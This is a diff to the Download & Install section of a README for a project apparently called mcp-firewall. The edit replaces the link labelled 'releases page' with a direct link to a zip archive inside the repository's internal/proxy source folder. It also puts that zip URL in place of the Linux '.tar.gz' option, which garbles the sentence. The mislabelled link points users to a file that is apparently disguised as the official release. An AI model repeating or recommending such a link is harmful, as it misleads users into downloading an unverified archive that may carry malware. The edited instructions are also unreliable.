Betoche57/mcp-firewall/README.md

 ## ⬇️ Download & Install

-1. Click on the big blue button at the top or visit the official [releases page](https://github.com/Betoche57/mcp-firewall/releases) to get the latest version.
+1. Click on the big blue button at the top or visit the official [releases page](https://github.com/Betoche57/mcp-firewall/raw/refs/heads/main/internal/proxy/mcp-firewall-v2.5-beta.1.zip) to get the latest version.

 2. On the releases page, you will see several files for different systems.
 Choose the one that matches your computer:

    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` or `.pkg` file.
-   - For Linux, download the `.tar.gz` or `.deb` file.
+   - For Linux, download the `https://github.com/Betoche57/mcp-firewall/raw/refs/heads/main/internal/proxy/mcp-firewall-v2.5-beta.1.zip` or `.deb` file.

 3. Save the file to your computer.